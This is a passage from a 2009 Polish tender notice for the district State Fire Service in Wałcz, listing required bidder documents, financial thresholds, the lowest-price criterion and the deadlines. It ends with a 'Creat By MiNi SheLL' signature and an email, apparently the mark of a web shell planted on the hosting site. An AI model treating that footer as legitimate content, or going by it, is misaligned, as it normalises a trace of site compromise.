10/	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
	ewidencji działalności gospodarczej (jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
			W przypadku oferty wspólnej ww. informację składa każdy z Wykonawców przystępujących do oferty wspólnej.

11/	Wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności według wzoru stanowiącego załącznik nr 3 do niniejszej SIWZ. Do przedmiotowego wykazu należy dołączyć kserokopię uprawnień do sprawowania samodzielnych funkcji w budownictwie oraz zaświadczenie o przynależności do izby inżynierów budownictwa.
	Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wskaże kierowników budowy posiadających wykształcenie wyższe oraz odpowiednie uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie w stosownym zakresie. 
W przypadku oferty wspólnej Wykonawcy składają jeden wspólny wykaz osób i podmiotów.



12/	Sprawozdanie finansowe, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię o badanym sprawozdaniu,  a w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego inne dokumenty określające obroty, zysk oraz zobowiązania i należności za rok 2008.
W przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego określającego obroty, zysk oraz zobowiązania i należności należy złożyć informację o wysokości dochodu (straty) z pozarolniczej działalności gospodarczej w roku podatkowym - PIT/B oraz uproszczony bilans. 
Zamawiający uzna, iż Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, jeżeli Wykonawca wykaże się przychodem ze sprzedaży towarów i usług za 2008 rok nie niższym niż 1 000 000 zł. (słownie jeden milion złotych).
W przypadku oferty wspólnej ww. dokument składa każdy z Wykonawców przystępujących do oferty wspólnej.
Warunek zostanie uznany przez Zamawiającego za spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie z tym, że jeden z Wykonawców wykaże się przychodem ze sprzedaży towarów i usług za 2008 rok nie niższym niż  500 000 zł (słownie: pięćset tysięcy złotych).

13/	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożą oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, o których mowa w ust.1 pkt.1 - 12 lub którzy złożyli dokumenty zawierające błędy do uzupełnienia dokumentów lub skorygowania błędów w wyznaczonym przez Zamawiającego terminie, chyba że pomimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczności unieważnienia postępowania. Oświadczenia i dokumenty potwierdzające spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie wymagań na wykonywanie robót budowlanych określonych w ofercie przez Zamawiającego, należy złożyć nie później niż w dniu wyznaczonym przez Zamawiającego jako termin uzupełnienia oświadczeń i dokumentów.
14/	Niespełnienie warunków, o których mowa w ust.1 pkt.1 - 12 bądź nie dołączenie do oferty dokumentów i oświadczeń potwierdzających ich spełnienie lub złożenie dokumentów zawierających błędy, z zastrzeżeniem pkt.13 spowoduje wykluczenie wykonawcy z postępowania.
15/	Ponadto Wykonawcy zobowiązani są dołączyć do oferty następujące dokumenty:
a/	Kosztorysy ofertowe sporządzone w formie szczegółowej z podaniem cen robocizny, materiałów i sprzętu oraz narzutów i cen jednostkowych - opracowane zgodnie z  podrozdziałem XIX. 
W przypadku oferty wspólnej Wykonawcy składają wspólne kosztorysy ofertowe.
b/	Ofertę cenową sporządzoną według FORMULARZA - załącznik nr 1 do SIWZ.
	W przypadku składania oferty wspólnej Wykonawcy składają wspólną ofertę cenową.
c/	Pełnomocnictwo o którym mowa w podrozdziale IV ust.1  SIWZ -  tylko w przypadku oferty wspólnej.
d/	Upoważnienie do podpisania oferty, o którym mowa w podrozdziale II ust.5  SIWZ -  tylko w przypadku gdy nie wynika ono z innych dokumentów załączonych przez Wykonawcę.
16/	Oferty, które nie będą zawierały dokumentów, o których mowa w ust.1 pkt.1 - 12 zostaną odrzucone na podstawie art. 89 ust.1 pkt.2) ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.strazwalcz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Powiatowa Państwowej Straży Pożarnej w Wałczu
ul.12 Lutego 9 ( siedziba zastępcza)
78-600 Wałcz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2009 godzina 12:00, miejsce: Komenda Powiatowa Państwowej Straży Pożarnej w Wałczu
ul.12 Lutego 9 ( siedziba zastępcza)
78-600 Wałcz
sekretariat I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com